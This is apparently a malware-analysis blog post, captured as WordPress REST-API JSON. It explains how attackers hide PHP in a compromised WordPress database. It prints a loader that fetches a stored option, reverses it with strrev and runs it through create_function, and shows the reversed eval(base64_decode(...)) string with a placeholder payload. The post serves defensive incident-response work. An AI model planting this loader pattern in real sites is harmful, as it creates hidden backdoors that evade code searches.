Malicious code is often stored in compromised databases, and referenced later for execution. This is a common method by which potentially dangerous PHP functions such as eval(); are hidden from automated and manual file contents searches.<\/p>\n\n\n\n
An example of one implementation of this can be seen here:<\/p>\n\n\n\n
<\/p>\n\n\n\n
global $wpdb;\n$trp_rss=$wpdb->get_var(\n\"SELECT option_value FROM $wpdb->options WHERE option_name='rss_f541b3abd05e7962fcab37737f40fad8'\");\npreg_match(\"!events or a cale\\\"\\;s\\:7\\:\\'(.*?)\\'!is\",$trp_rss,$trp_m);\n$trp_f=create_function(\"\",strrev($trp_m[1]));\n$trp_f();<\/pre>\n\n\n\nIn this example, a value is retrieved from a compromised WordPress database. The value is reversed back to front using PHP\u2019s strrev(); function. A new function is then created from the resulting value, and executed.<\/p>\n\n\n\n
Lost? The value being retrieved from the database will help clear things up:<\/p>\n\n\n\n
<\/p>\n\n\n\n
;))\"edoclam_desrever_dedocne_46esab\"(edoced_46esab(lave<\/pre>\n\n\n\nStill lost? Remember, PHP\u2019s strrev(); (string reverse) function is being applied to this string prior to its execution. Let\u2019s see what it looks like reversed\u2026.<\/p>\n\n\n\n
<\/p>\n\n\n\n
eval(base64_decode(\"base64_encoded_reversed_malcode\"));<\/pre>\n\n\n\nAnd there it is! We have our malicious code, neatly hidden from automated and manual searches within the confines of a compromised WordPress database.<\/p>\n\n\n\n
Not only that, but the potentially dangerous PHP functions we may be searching for (eval(); and base64_decode();) are stored in reverse, making them that much more difficult to locate.<\/p>\n\n\n\n
Final Thoughts:<\/p>\n\n\n\n
The storage of malicious code in a compromised database for later execution can be accomplished without using the strrev(); trick to hide the presence of eval(); and other such functions from searches \u2013 that just happens to be a method that this particular attacker happened to employ in this case.<\/p>\n\n\n\n
This particular example is a very good illustration of why database audits are important when a site and its related databases are compromised and known-clean backups do not exist.<\/p>\n","protected":false},"excerpt":{"rendered":"
Malicious code is often stored in compromised databases, and referenced later for execution. This is a common method by which potentially dangerous PHP functions such as eval(); are hidden from automated and manual file contents searches. An example of one implementation of this can be seen here: In this example, a value is retrieved from […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-22","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/posts\/22","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/comments?post=22"}],"version-history":[{"count":4,"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/posts\/22\/revisions"}],"predecessor-version":[{"id":28,"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/posts\/22\/revisions\/28"}],"wp:attachment":[{"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/media?parent=22"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/categories?post=22"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/tags?post=22"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}